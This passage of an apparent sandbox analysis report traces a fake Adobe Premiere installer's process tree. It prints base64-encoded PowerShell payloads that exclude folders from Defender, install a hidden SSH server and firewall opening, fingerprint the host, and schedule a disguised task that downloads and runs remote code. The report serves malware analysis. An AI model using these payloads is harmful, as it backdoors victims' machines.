HQALQBGAGkAbABlAEgAYQBzAGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAEEAbABnAG8AcgBpAHQAaABtACAATQBEADUAOwAKACQASABXAEkARAAgAD0AIAAkAE0ARAA1AC4ASABhAHMAaAAuAHQAbwBMAG8AdwBlAHIAKAApADsACgAkAFcAcgBpAHQAZQBGAGkAbABlAD0AJwB5AGUAcwAnADsACgB9ADsACgBpAGYAKAAkAFcAcgBpAHQAZQBGAGkAbABlACAALQBlAHEAIAAnAHkAZQBzACcAKQB7AFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQASABXAEkARABEAEEAVAAgAC0AVgBhAGwAdQBlACAAJABIAFcASQBEADsAfQA7AA==
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2020
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c "powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABMAG8AYwBhAGwAUABvAHIAdAAgAD0AIAAxADAAOQA7AAoAJABSAGUAYwBvAHYAZQByAHkASABvAG0AZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwB0ADAAMgB1AG4ALgBjAGYAZAAvAG8AbgBsAGkAbgBlAC8AdAB1AG4AdQBwAGQALgBwAGgAcAAnADsACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQA7AAoAJABGAGkAbAB0AGUAcgAgAD0AIAAnAE4AYQBtAGUAPQAnACcAcwBzAGgAZAAnACcAJwA7AAoAJABzAGUAcgB2AGkAYwBlACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAFMAZQByAHYAaQBjAGUAIAAtAEYAaQBsAHQAZQByACAAJABGAGkAbAB0AGUAcgA7AAoAaQBmACgAJABzAGUAcgB2AGkAYwBlAC4AUwB0AGEAdAB1AHMAIAAtAGUAcQAgACcATwBLACcAKQB7AFMAdABvAHAALQBTAGUAcgB2AGkAYwBlACAAcwBzAGgAZAA7AH0AOwAKAEEAZABkAC0AVwBpAG4AZABvAHcAcwBDAGEAcABhAGIAaQBsAGkAdAB5ACAALQBPAG4AbABpAG4AZQAgAC0ATgBhAG0AZQAgAE8AcABlAG4AUwBTAEgALgBTAGUAcgB2AGUAcgB+AH4AfgB+ADAALgAwAC4AMQAuADAAOwAKAGMAZAAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABzAHMAaAA7AAoAJABGAGkAbABlAEMAZgBnAD0AJwBzAHMAaABkAF8AYwBvAG4AZgBpAGcAJwA7AAoAJABMAGkAbgBrAEMAZgBnAD0AJABSAGUAYwBvAHYAZQByAHkASABvAG0AZQBVAFIATAArACcAPwBmAD0AYwBmAGcAJwA7AAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQATABpAG4AawBDAGYAZwAgAC0ATwB1AHQARgBpAGwAZQAgACQARgBpAGwAZQBDAGYAZwA7AAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgAHMAcwBoAGQAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACcAUwBlAGMAdQByAGkAdAB5ACAAVQBwAGQAYQB0AGUAcgAnACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwB0AG8AYwBvAGwAIABUAEMAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEwAbwBjAGEAbABQAG8AcgB0ACAAJABMAG8AYwBhAGwAUABvAHIAdAA7AAoAUwBlAHQALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAcwBzAGgAZAAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAJwBBAHUAdABvAG0AYQB0AGkAYwAnADsACgAkAEUAbgB2AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQArACcAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATwBwAGUAbgBTAFMASAA7ACcAKwAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACsAJwBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAIAAoAHgAOAA2ACkAXABPAHAAZQBuAFMAUwBIADsAJwArACQAZQBuAHYAOgBQAEEAVABIADsACgBzAGUAdAB4ACAALwBNACAAUABBAFQASAAgACQARQBuAHYAUABhAHQAaAA7AA=="
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4768
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABMAG8AYwBhAGwAUABvAHIAdAAgAD0AIAAxADAAOQA7AAoAJABSAGUAYwBvAHYAZQByAHkASABvAG0AZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwB0ADAAMgB1AG4ALgBjAGYAZAAvAG8AbgBsAGkAbgBlAC8AdAB1AG4AdQBwAGQALgBwAGgAcAAnADsACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQA7AAoAJABGAGkAbAB0AGUAcgAgAD0AIAAnAE4AYQBtAGUAPQAnACcAcwBzAGgAZAAnACcAJwA7AAoAJABzAGUAcgB2AGkAYwBlACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAFMAZQByAHYAaQBjAGUAIAAtAEYAaQBsAHQAZQByACAAJABGAGkAbAB0AGUAcgA7AAoAaQBmACgAJABzAGUAcgB2AGkAYwBlAC4AUwB0AGEAdAB1AHMAIAAtAGUAcQAgACcATwBLACcAKQB7AFMAdABvAHAALQBTAGUAcgB2AGkAYwBlACAAcwBzAGgAZAA7AH0AOwAKAEEAZABkAC0AVwBpAG4AZABvAHcAcwBDAGEAcABhAGIAaQBsAGkAdAB5ACAALQBPAG4AbABpAG4AZQAgAC0ATgBhAG0AZQAgAE8AcABlAG4AUwBTAEgALgBTAGUAcgB2AGUAcgB+AH4AfgB+ADAALgAwAC4AMQAuADAAOwAKAGMAZAAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABzAHMAaAA7AAoAJABGAGkAbABlAEMAZgBnAD0AJwBzAHMAaABkAF8AYwBvAG4AZgBpAGcAJwA7AAoAJABMAGkAbgBrAEMAZgBnAD0AJABSAGUAYwBvAHYAZQByAHkASABvAG0AZQBVAFIATAArACcAPwBmAD0AYwBmAGcAJwA7AAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQATABpAG4AawBDAGYAZwAgAC0ATwB1AHQARgBpAGwAZQAgACQARgBpAGwAZQBDAGYAZwA7AAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgAHMAcwBoAGQAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACcAUwBlAGMAdQByAGkAdAB5ACAAVQBwAGQAYQB0AGUAcgAnACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwB0AG8AYwBvAGwAIABUAEMAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEwAbwBjAGEAbABQAG8AcgB0ACAAJABMAG8AYwBhAGwAUABvAHIAdAA7AAoAUwBlAHQALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAcwBzAGgAZAAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAJwBBAHUAdABvAG0AYQB0AGkAYwAnADsACgAkAEUAbgB2AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQArACcAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATwBwAGUAbgBTAFMASAA7ACcAKwAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACsAJwBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAIAAoAHgAOAA2ACkAXABPAHAAZQBuAFMAUwBIADsAJwArACQAZQBuAHYAOgBQAEEAVABIADsACgBzAGUAdAB4ACAALwBNACAAUABBAFQASAAgACQARQBuAHYAUABhAHQAaAA7AA==
                                        5⤵
                                        • Drops file in Windows directory
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2476
                                        • C:\Users\Admin\AppData\Local\Temp\11A900D9-EBBD-4CC4-A54F-57582C8E518F\dismhost.exe
                                          C:\Users\Admin\AppData\Local\Temp\11A900D9-EBBD-4CC4-A54F-57582C8E518F\dismhost.exe {DD3321E7-4D6B-4CF8-B1AF-29A5722FFE85}
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Windows directory
                                          PID:1724
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:1664
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:4968
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:1656
                                    • C:\Users\Admin\Downloads\AdobePremierePro25.exe
                                      "C:\Users\Admin\Downloads\AdobePremierePro25.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:2508
                                      • C:\Users\Admin\AppData\Local\Temp\is-N9HUV.tmp\AdobePremierePro25.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-N9HUV.tmp\AdobePremierePro25.tmp" /SL5="$A028A,94638087,864256,C:\Users\Admin\Downloads\AdobePremierePro25.exe"
                                        2⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3960
                                        • C:\Windows\SysWOW64\CMD.exe
                                          "CMD" /C "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\YardConstantly.7z.bat"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4412
                                          • C:\Users\Admin\AppData\Roaming\AdobePremierePro25\7z.exe
                                            "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\7z.exe" x -aoa "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\YardConstantly.7z" -p"8ac600c4b78" -o"C:\Users\Admin\AppData\Roaming\AdobePremierePro25\"
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:3924
                                        • C:\Windows\SysWOW64\CMD.exe
                                          "CMD" /C del "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\YardConstantly.7z.bat"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3592
                                        • C:\Windows\SysWOW64\CMD.exe
                                          "CMD" /C del "YardConstantly.7z"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:232
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd" /C "C:\Users\Admin\AppData\Roaming\AdobePremierePro25\Set-up.exe"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3896
                                          • C:\Users\Admin\AppData\Roaming\AdobePremierePro25\Set-up.exe
                                            C:\Users\Admin\AppData\Roaming\AdobePremierePro25\Set-up.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Modifies Internet Explorer settings
                                            PID:1636
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoLogo -NonInteractive -ep Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwAKAHMAdABhAHIAdAAtAHMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7AAoA"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1408
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoLogo -NonInteractive -ep Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwAKAHMAdABhAHIAdAAtAHMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMAA7AAoA
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2344
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c "powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABMAGkAbgBrAE8AbgBlAFIAIAA9ACAAJwBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBQAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEIAeQBBAEcAVQBBAFkAdwBCAGkAQQBHAEUAQQBMAGcAQgBrAEEARwBrAEEAWgB3AEIAcABBAEgAUQBBAFkAUQBCAHMAQQBDAGMAQQBPAHcAQQBLAEEAQwBRAEEAUQB3AEEAOQBBAEcAawBBAGQAdwBCAHkAQQBDAEEAQQBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBMAFEAQgBWAEEASABNAEEAUgBRAEIAQwBBAEcARQBBAFUAdwBCAEoAQQBHAE0AQQBVAEEAQgBCAEEASABJAEEAYwB3AEIAcABBAEUANABBAFoAdwBBAGcAQQBIAHcAQQBhAFEAQgBsAEEASABnAEEATwB3AEEAPQAnADsACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsACgAkAEQAMQAgAD0AIAAkAFQALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABEADIAIAA9ACAAJABUAC4AQQBkAGQARABhAHkAcwAoADEAKQA7AAoAJABEADIAIAA9ACAAJABEADIALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABUACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAAxADgAKQA7AAoAJABUADEAIAA9ACAAJABUAC4AQQBkAGQATQBpAG4AdQB0AGUAcwAoADMANwApADsACgAkAFQAUgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0ACAAJABUADEAIAAtAFcAZQBlAGsAbAB5ACAALQBEAGEAeQBzAE8AZgBXAGUAZQBrACAAJABEADEALAAkAEQAMgA7AAoAJABQAFMAIAA9ACAAJABlAG4AdgA6AHcAaQBuAGQAaQByACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgA7AAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AAoAJABQACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAaQBwAGEAbAAgAC0AVQBzAGUAcgAgACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAIAAtAEwAbwBnAG8AbgBUAHkAcABlACAAUwA0AFUAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQACgAkAFMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0ATQB1AGwAdABpAHAAbABlAEkAbgBzAHQAYQBuAGMAZQBzACAAUABhAHIAYQBsAGwAZQBsACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEgAaQBkAGQAZQBuADsACgAkAFQATgAgAD0AIAAiAEcARAByAGkAdgBlACAAQgBhAGMAawB1AHAAIABTAHkAbgBjACIAOwAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVABSACAALQBBAGMAdABpAG8AbgAgACQAQQAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTACAALQBQAHIAaQBuAGMAaQBwAGEAbAAgACQAUAA7AA=="
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4084
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABMAGkAbgBrAE8AbgBlAFIAIAA9ACAAJwBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBQAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEIAeQBBAEcAVQBBAFkAdwBCAGkAQQBHAEUAQQBMAGcAQgBrAEEARwBrAEEAWgB3AEIAcABBAEgAUQBBAFkAUQBCAHMAQQBDAGMAQQBPAHcAQQBLAEEAQwBRAEEAUQB3AEEAOQBBAEcAawBBAGQAdwBCAHkAQQBDAEEAQQBKAEEAQgBNAEEARwBrAEEAYgBnAEIAcgBBAEUAawBBAFIAUQBCAFkAQQBDAEEAQQBMAFEAQgBWAEEASABNAEEAUgBRAEIAQwBBAEcARQBBAFUAdwBCAEoAQQBHAE0AQQBVAEEAQgBCAEEASABJAEEAYwB3AEIAcABBAEUANABBAFoAdwBBAGcAQQBIAHcAQQBhAFEAQgBsAEEASABnAEEATwB3AEEAPQAnADsACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsACgAkAEQAMQAgAD0AIAAkAFQALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABEADIAIAA9ACAAJABUAC4AQQBkAGQARABhAHkAcwAoADEAKQA7AAoAJABEADIAIAA9ACAAJABEADIALgBEAGEAeQBPAGYAVwBlAGUAawA7AAoAJABUACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAAxADgAKQA7AAoAJABUADEAIAA9ACAAJABUAC4AQQBkAGQATQBpAG4AdQB0AGUAcwAoADMANwApADsACgAkAFQAUgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0ACAAJABUADEAIAAtAFcAZQBlAGsAbAB5ACAALQBEAGEAeQBzAE8AZgBXAGUAZQBrACAAJABEADEALAAkAEQAMgA7AAoAJABQAFMAIAA9ACAAJABlAG4AdgA6AHcAaQBuAGQAaQByACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgA7AAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AAoAJABQACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAaQBwAGEAbAAgAC0AVQBzAGUAcgAgACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAIAAtAEwAbwBnAG8AbgBUAHkAcABlACAAUwA0AFUAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQACgAkAFMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0ATQB1AGwAdABpAHAAbABlAEkAbgBzAHQAYQBuAGMAZQBzACAAUABhAHIAYQBsAGwAZQBsACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEgAaQBkAGQAZQBuADsACgAkAFQATgAgAD0AIAAiAEcARAByAGkAdgBlACAAQgBhAGMAawB1AHAAIABTAHkAbgBjACIAOwAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsACgBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVABSACAALQBBAGMAdABpAG8AbgAgACQAQQAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTACAALQBQAHIAaQBuAGMAaQBwAGEAbAAgACQAUAA7AA==
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:232
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c "powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABIAFcASQBEAEQAQQBUACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAKwAnAFwAaAB3AGkAZAAuAGQAYQB0ACcAOwAKACQASABXAEkARABTAFIAQwAgAD0AIAAkAEgAVwBJAEQARABBAFQAOwAKAGkAZgAoAC0ATgBvAHQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABIAFcASQBEAEQAQQBUACkAKQB7ACQASABXAEkARABTAFIAQwAgAD0AIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQArACcAXABoAHcAaQBkAC4AZABhAHQAJwA7ACQAVwByAGkAdABlAEYAaQBsAGUAPQAnAHkAZQBzACcAOwB9ADsACgAkAEgAVwBJAEQAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABIAFcASQBEAFMAUgBDADsACgBpAGYAKAAtAE4ATwBUACgAJABIAFcASQBEAC4AbABlAG4AZwB0AGgAIAAtAGUAcQAgADMAMgApACkAewAKACQAcwB5AHMAUAByAG8AZAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAFAAcgBvAGQAdQBjAHQAOwAKACQAdQB1AGkAZAAgAD0AIAAkAHMAeQBzAFAAcgBvAGQALgBVAFUASQBEADsACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACsAJAB1AHUAaQBkACIAOwAKACQATQBEADUAIAA9ACAARwBlAHQALQBGAGkAbABlAEgAYQBzAGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAEEAbABnAG8AcgBpAHQAaABtACAATQBEADUAOwAKACQASABXAEkARAAgAD0AIAAkAE0ARAA1AC4ASABhAHMAaAAuAHQAbwBMAG8AdwBlAHIAKAApADsACgAkAFcAcgBpAHQAZQBGAGkAbABlAD0AJwB5AGUAcwAnADsACgB9ADsACgBpAGYAKAAkAFcAcgBpAHQAZQBGAGkAbABlACAALQBlAHEAIAAnAHkAZQBzACcAKQB7AFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQASABXAEkARABEAEEAVAAgAC0AVgBhAGwAdQBlACAAJABIAFcASQBEADsAfQA7AA=="
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3396
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nop -NoLogo -NonInteractive -ep Bypass -enc JABIAFcASQBEAEQAQQBUACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAKwAnAFwAaAB3AGkAZAAuAGQAYQB0ACcAOwAKACQASABXAEkARABTAFIAQwAgAD0AIAAkAEgAVwBJAEQARABBAFQAOwAKAGkAZgAoAC0ATgBvAHQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABIAFcASQBEAEQAQQBUACkAKQB7ACQASABXAEkARABTAFIAQwAgAD0AIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQArACcAXABoAHcAaQBkAC4AZABhAHQAJwA7ACQAVwByAGkAdABlAEYAaQBsAGUAPQAnAHkAZQBzACcAOwB9ADsACgAkAEgAVwBJAEQAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABIAFcASQBEAFMAUgBDADsACgBpAGYAKAAtAE4ATwBUACgAJABIAFcASQBEAC4AbABlAG4AZwB0AGgAIAAtAGUAcQAgADMAMgApACkAewAKACQAcwB5AHMAUAByAG8AZAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAFAAcgBvAGQAdQBjAHQAOwAKACQAdQB1AGkAZAAgAD0AIAAkAHMAeQBzAFAAcgBvAGQALgBVAFUASQBEADsACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlACsAJAB1AHUAaQBkACIAOwAKACQATQBEADUAIAA9ACAARwBlAHQALQBGAGkAbABlAEgAYQBzAGgAIAAkAEgAVwBJAEQARABBAFQAIAAtAEEAbABnAG8AcgBpAHQAaABtACAATQBEADUAOwAKACQASABXAEkARAAgAD0AIAAkAE0ARAA1AC4ASABhAHMAaAAuAHQAbwBMAG8AdwBlAHIAKAApADsACgAkAFcAcgBpAHQAZQBGAGkAbABlAD0AJwB5AGUAcwAnADsACgB9ADsACgBpAGYAKAAkAFcAcgBpAHQAZQBGAGkAbABlACAALQBlAHEAIAAnAHkAZQBzACcAKQB7AFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQASABXAEkARABEAEEAVAAgAC0AVgBhAGwAdQBlACAAJABIAFcASQBEADsAfQA7AA==
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:520
                                        • C:\Windows\SysWOW64\cmd.exe
